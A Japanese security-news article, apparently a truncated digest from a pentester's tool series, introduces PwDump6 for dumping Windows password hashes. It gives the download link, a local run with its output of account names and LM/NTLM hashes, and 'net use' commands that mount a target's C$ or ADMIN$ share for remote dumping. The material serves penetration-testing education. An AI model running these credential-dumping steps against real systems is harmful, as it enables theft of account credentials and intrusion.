現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」 | ScanNetSecurity
2024.07.27(土)

現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」

このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。

特集
このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。


・名称…PwDumpシリーズ

・分野…ダンピング

・配布制限…GPL

・商用版の有無…無

・類似ツール…

・DL URL…http://swamp.foofus.net/fizzgig/pwdump/

・対応OS…Windows系OS


(1) 基本項目と概要

Windows内に格納されているハッシュ化されたパスワード(以下ハッシュ値)を管理者権限を用いて取得するツールである。取得できたパスワードはハッシュ化されているので当然そのままでは使用することはできない。だが、そのハッシュ値をクラッキング(解析)するツールも存在する。そのツールに関しては別の機会に紹介する。

今回、名称に「シリーズ」と付けたのは、このツールは様々な作者の手で様々な改良を加えられ筆者の把握している限りでは「PwDump7」までリリースされているためである。(中にはPwDump3eやPwDumpXというものも存在する。)
今回は、リモートからもハッシュを取得することができるPwDump6を紹介する。


(2) コマンドサンプル

まずは、ローカルでハッシュ値の取得を行ってみよう。ローカルで実行するには管理者権限でログオンし、引数に自身のIPアドレス、もしくは、マシン名を指定し実行する。

【ローカルでのハッシュ値取得】
C: oolpwdump6>PwDump.exe 127.0.0.1

pwdump6 Version 1.0 by fizzgig and the mighty group at foofus.net
Copyright 2005 foofus.net

〜 略 〜

Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
ASPNET:1003:0DFC661619C403307257C4412C76C3D6:E0DB5F12B184E1B7C428DF219D8C8542:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
IUSR_VICTIM-W2K:1001:9339643A483133C5F148CCED8419DB8C:9EEC81248556914270CBB7DB90D65F7C:::
IWAM_VICTIM-W2K:1002:54A5A4E317A3830FACC9C4E468C7207F:6077983EE0789DC1242BC8CDACFAEF51:::
TsInternetUser:1000:2F0F7C5F5264DE66462979F0C902E19B:AA44FFD5EEE101F33470A40C09835341:::
tsuji:1005:41B020478F5B4014AAD3B435B51404EE:A1059C9934521426A854BB819B6C5CC3:::
Completed.

上記のように取得され表示される内容は、一行あたり、

ユーザ名:uid:ハッシュ

という形式である。

次に、リモートからの取得である。リモートの場合でも、ローカルと同じく管理者権限が必要となる。ヘルプを見る限りでは、実行時にユーザ名とパスワードを指定することでリモートから取得できそうなのだが正しいユーザ名、パスワードを設定しても正常に動作せず、ハッシュ値を取得することはできない。そのため、別の方法で、リモートから管理者権限で対象の共有資源をマウントしておく必要がある。マウントする方法は、下記の通りである。

net use \対象のIPアドレスC$ /user:"ユーザ名" "パスワード"

または

net use \対象のIPアドレスADMIN$ /user:"ユーザ名" "パスワード"

上記コマンドを実行し「コマンドは正常に終了しました。」と表示されればマウントは成功である。PwDumpを実行し、リモートからハッシュ値を取得する準備が整ったことになる。

それでは、実行してみよう…

【執筆:NTTデータ・セキュリティ株式会社 辻 伸弘】
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw
《ScanNetSecurity》

特集

現役ペンテスト技術者が選ぶ 使えるセキュリティツール

特集 アクセスランキング

  1. 今日もどこかで情報漏えい 第26回「2024年6月の情報漏えい」ふたつの “完全には否定できない” 違いは どこを向いているか

    今日もどこかで情報漏えい 第26回「2024年6月の情報漏えい」ふたつの “完全には否定できない” 違いは どこを向いているか

  2. 能力のないサーバ管理者 サーバモンキーはネットセキュリティの危険因子

    能力のないサーバ管理者 サーバモンキーはネットセキュリティの危険因子

  3. アンチ・シリコンジャーナリズム それってデータの裏付けあるの? 前編「存在しない『炎上』の作り方」

    アンチ・シリコンジャーナリズム それってデータの裏付けあるの? 前編「存在しない『炎上』の作り方」

  4. Scan社長インタビュー 第1回「NRIセキュア 柿木 彰 社長就任から200日間」前編

アクセスランキングをもっと見る

「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」
「経理」「営業」「企画」「プログラミング」「デザイン」と並ぶ、事業で成功するためのビジネスセンスが「セキュリティ」

ページ右上「ユーザー登録」から会員登録すれば会員限定記事を閲覧できます。毎週月曜の朝、先週一週間のセキュリティ動向を総括しふりかえるメルマガをお届け。(写真:ScanNetSecurity 名誉編集長 りく)

×